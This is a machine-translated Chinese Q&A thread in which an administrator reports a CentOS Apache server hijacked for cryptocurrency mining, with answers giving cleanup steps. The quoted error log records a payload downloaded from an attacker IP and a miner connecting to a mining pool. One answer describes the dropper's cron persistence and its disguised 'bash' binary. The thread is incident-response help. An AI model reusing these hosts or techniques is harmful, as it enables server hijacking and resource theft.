伺服器被劫持/被用作比特幣礦工 - 我該如何阻止這種情況?

tag-icon tag-icon centos apache-http-server bitcoin
伺服器被劫持/被用作比特幣礦工 - 我該如何阻止這種情況?

我遇到了一些情況,我的伺服器被劫持了,它似乎參與了比特幣挖掘操作。

我至少需要知道從哪裡開始,我是一名新手系統管理員,以前從未遇到過這種情況。它讓我的頻寬大吃一驚,我的託管提供者向我收取每 GB 50c 的費用,因此一天之內我的頻寬增加了 255GB -> 301.8GB。任何幫助表示讚賞。

我在與 Stratum 相關的日誌以及針對我的伺服器運行的外部 IP 位址上的腳本中發現了很多垃圾。然後我查看 /tmp 目錄,看到 7 個文件,它們是

  • 巴什
  • cron.d
  • 機械目錄
  • spamd_full.sock
  • 更新

我的apache錯誤日誌內容範例如下:

[Thu Nov 28 16:27:40 2013] [error] [client 173.201.45.104] --2013-11-28 16:27:40--  http://74.208.228.113/sh
[Thu Nov 28 16:27:40 2013] [error] [client 173.201.45.104] Connecting to 74.208.228.113:80...
[Thu Nov 28 16:27:40 2013] [error] [client 173.201.45.104] connected.
[Thu Nov 28 16:27:40 2013] [error] [client 173.201.45.104] HTTP request sent, awaiting response...
[Thu Nov 28 16:27:40 2013] [error] [client 173.201.45.104] 200 OK
[Thu Nov 28 16:27:40 2013] [error] [client 173.201.45.104] Length:
[Thu Nov 28 16:27:40 2013] [error] [client 173.201.45.104] 518288
[Thu Nov 28 16:27:40 2013] [error] [client 173.201.45.104]  (506K)
[Thu Nov 28 16:27:40 2013] [error] [client 173.201.45.104]  [text/plain]
[Thu Nov 28 16:27:40 2013] [error] [client 173.201.45.104] Saving to: `sh'
[Thu Nov 28 16:27:40 2013] [error] [client 173.201.45.104]
[Thu Nov 28 16:27:40 2013] [error] [client 173.201.45.104]      0K
[Thu Nov 28 16:27:40 2013] [error] [client 173.201.45.104]
[Thu Nov 28 16:27:40 2013] [error] [client 173.201.45.104] .
[Thu Nov 28 16:27:40 2013] [error] [client 173.201.45.104] ... .......... ..........  9%  148K 3s
[Thu Nov 28 16:27:40 2013] [error] [client 173.201.45.104]     50K ........
[Thu Nov 28 16:27:40 2013] [error] [client 173.201.45.104] .. .......... .......... .......... .....
[Thu Nov 28 16:27:40 2013] [error] [client 173.201.45.104] ..... 19%  172K 3s
[Thu Nov 28 16:27:40 2013] [error] [client 173.201.45.104]    100K .......... .......... ......
[Thu Nov 28 16:27:41 2013] [error] [client 173.201.45.104] .... .......... .......... 29%  344K 2s
[Thu Nov 28 16:27:41 2013] [error] [client 173.201.45.104]    150K .......
[Thu Nov 28 16:27:41 2013] [error] [client 173.201.45.104] ... .......... .......... .......... .......... 39%  514K 1s
[Thu Nov 28 16:27:41 2013] [error] [client 173.201.45.104]    200K .........
[Thu Nov 28 16:27:41 2013] [error] [client 173.201.45.104] .
[Thu Nov 28 16:27:41 2013] [error] [client 173.201.45.104]  ..
[Thu Nov 28 16:27:41 2013] [error] [client 173.201.45.104] .
[Thu Nov 28 16:27:41 2013] [error] [client 173.201.45.104] .
[Thu Nov 28 16:27:41 2013] [error] [client 173.201.45.104] ..
[Thu Nov 28 16:27:41 2013] [error] [client 173.201.45.104] .
[Thu Nov 28 16:27:41 2013] [error] [client 173.201.45.104] .
[Thu Nov 28 16:27:41 2013] [error] [client 173.201.45.104] .. .......... .......... .......... 49%  347K 1s
[Thu Nov 28 16:27:41 2013] [error] [client 173.201.45.104]    250K .......... .......... .......... ........
[Thu Nov 28 16:27:41 2013] [error] [client 173.201.45.104] .. .......... 59%  347K 1s
[Thu Nov 28 16:27:41 2013] [error] [client 173.201.45.104]    300K .......... .......... .......... .......... .......... 69%  224M 1s
[Thu Nov 28 16:27:41 2013] [error] [client 173.201.45.104]    350K .
[Thu Nov 28 16:27:41 2013] [error] [client 173.201.45.104] ......... .......... .......... .......... .......... 79%  347K 0s
[Thu Nov 28 16:27:41 2013] [error] [client 173.201.45.104]    400K .......... ...
[Thu Nov 28 16:27:41 2013] [error] [client 173.201.45.104] ....... .......... .......... .......... 88%  348K 0s
[Thu Nov 28 16:27:41 2013] [error] [client 173.201.45.104]    450K .......... .......... .......... .......... .......... 98%  254M 0s
[Thu Nov 28 16:27:41 2013] [error] [client 173.201.45.104]    500K ...
[Thu Nov 28 16:27:41 2013] [error] [client 173.201.45.104] ...                                                100% 64.1K=1.5s
[Thu Nov 28 16:27:41 2013] [error] [client 173.201.45.104]
[Thu Nov 28 16:27:41 2013] [error] [client 173.201.45.104] 2013-11-28 16:27:41 (328 KB/s) - `sh' saved [518288/518288]
[Thu Nov 28 16:27:41 2013] [error] [client 173.201.45.104]
[Thu Nov 28 16:27:58 2013] [error] [client 173.201.45.104] kill: usage: kill [-s sigspec | -n signum | -sigspec] pid | jobspec ... or kill -l [sigspec]
[Thu Nov 28 16:28:26 2013] [error] [client 173.201.45.104] kill: usage: kill [-s sigspec | -n signum | -sigspec] pid | jobspec ... or kill -l [sigspec]
[Thu Nov 28 16:28:26 2013] [error] [client 173.201.45.104] a: line 24: ./bash: No such file or directory
[Thu Nov 28 16:28:26 2013] [error] [client 173.201.45.104] chattr
[Thu Nov 28 16:28:26 2013] [error] [client 173.201.45.104] :
[Thu Nov 28 16:28:26 2013] [error] [client 173.201.45.104] Operation not permitted
[Thu Nov 28 16:28:26 2013] [error] [client 173.201.45.104]
[Thu Nov 28 16:28:26 2013] [error] [client 173.201.45.104] while setting flags on bash
[Thu Nov 28 16:28:26 2013] [error] [client 173.201.45.104] \r
[Thu Nov 28 16:28:26 2013] [error] [client 173.201.45.104] chattr
[Thu Nov 28 16:28:26 2013] [error] [client 173.201.45.104] :
[Thu Nov 28 16:28:26 2013] [error] [client 173.201.45.104] Operation not permitted
[Thu Nov 28 16:28:26 2013] [error] [client 173.201.45.104]
[Thu Nov 28 16:28:26 2013] [error] [client 173.201.45.104] while setting flags on sh
[Thu Nov 28 16:28:26 2013] [error] [client 173.201.45.104] \r
[Thu Nov 28 16:28:28 2013] [error] [client 173.201.45.104] [2013-11-28 16:28:28] 2 miner threads started, using 'scrypt' algorithm.
[Thu Nov 28 16:28:28 2013] [error] [client 173.201.45.104] [2013-11-28 16:28:28] Starting Stratum on stratum+tcp://216.230.103.42:3333
[Thu Nov 28 16:28:28 2013] [error] [client 173.201.45.104] [2013-11-28 16:28:28] Stratum connection failed: Failed connect to 216.230.103.42:3333; Connection refused
[Thu Nov 28 16:28:28 2013] [error] [client 173.201.45.104] [2013-11-28 16:28:28] ...retry after 30 seconds
[Thu Nov 28 16:28:33 2013] [error] [client 173.201.45.104] [2013-11-28 16:28:33] Binding thread 1 to cpu 1
[Thu Nov 28 16:28:58 2013] [error] [client 173.201.45.104] [2013-11-28 16:28:58] Stratum connection failed: Failed connect to 216.230.103.42:3333; Connection refused
[Thu Nov 28 16:28:58 2013] [error] [client 173.201.45.104] [2013-11-28 16:28:58] ...retry after 30 seconds
[Thu Nov 28 16:29:21 2013] [error] [client 173.201.45.104] [2013-11-28 16:29:21] Binding thread 0 to cpu 0
[Thu Nov 28 16:29:28 2013] [error] [client 173.201.45.104] [2013-11-28 16:29:28] Stratum connection failed: Failed connect to 216.230.103.42:3333; Connection refused

答案1

我首先使用 iptables 來阻止與外部位址的連接

iptables -A OUTPUT -d IP_Address -j DROP

一旦您確定所有 IP 位址都被阻止,請儲存 iptables:# /sbin/service iptables save然後清理劫持者放置的檔案。

您可能想要查看/etc/var/log/messages劫機者/etc/var/log/secure是否留下了任何可能表明他/她如何在您的伺服器上立足的條目。

如果您正在執行網站,請確保您沒有任何允許使用者上傳檔案(例如 PHP shell)的網頁。

這應該可以幫助您開始。您也可以要求您的託管提供者執行防毒掃描,以查找允許存取的任何腳本/檔案。

答案2

您的機器人礦工沒有連接,因此它會不斷重新運行漏洞並一遍又一遍地下載礦工。

我們最近看到了對看起來相關的不良 cgi-bin 設定的利用嘗試。

它正在嘗試下載

74.208.228.113 / a

並將其作為 shell 腳本執行。

當我們查看該腳本時,它做了一些事情,它清除了 crontab 條目,並嘗試運行從

74.208.228.113 / update

它還將相同的腳本放置在 /etc/cron.hourly 中

該腳本執行“ps x”和 grep 來成功連接礦工。如果沒有看到它,它會再次下載腳本並重新運行。

在腳本的最後,它抓住了

74.208.228.113 / clamav


74.208.228.113 / sh

看起來是不同編譯版的 minerd。它將 clamav 重新命名為 bash,然後在 216.230.103.42 啟動這兩個挖掘。

因此,如果您受到類似方式的剝削,您需要:

  1. 禁用 cgi-bin

  2. 檢查 crontab 中是否有執行 httpd 的使用者(可能是 root 或 apache)並刪除「update」條目

  3. 檢查 /etc/cron.hourly/ 是否有一個名為 update 的文件,看看它是否引用了礦工無法連接的 216.230.103.42。刪除那個到

正是這些更新條目正在使用頻寬。 crontab 每分鐘運行一次。

然而,我認為更好的答案是從軌道上用核武攻擊它。如果您的 cgi-bin 設定為允許執行腳本的遠端攻擊,則無法保證

相關內容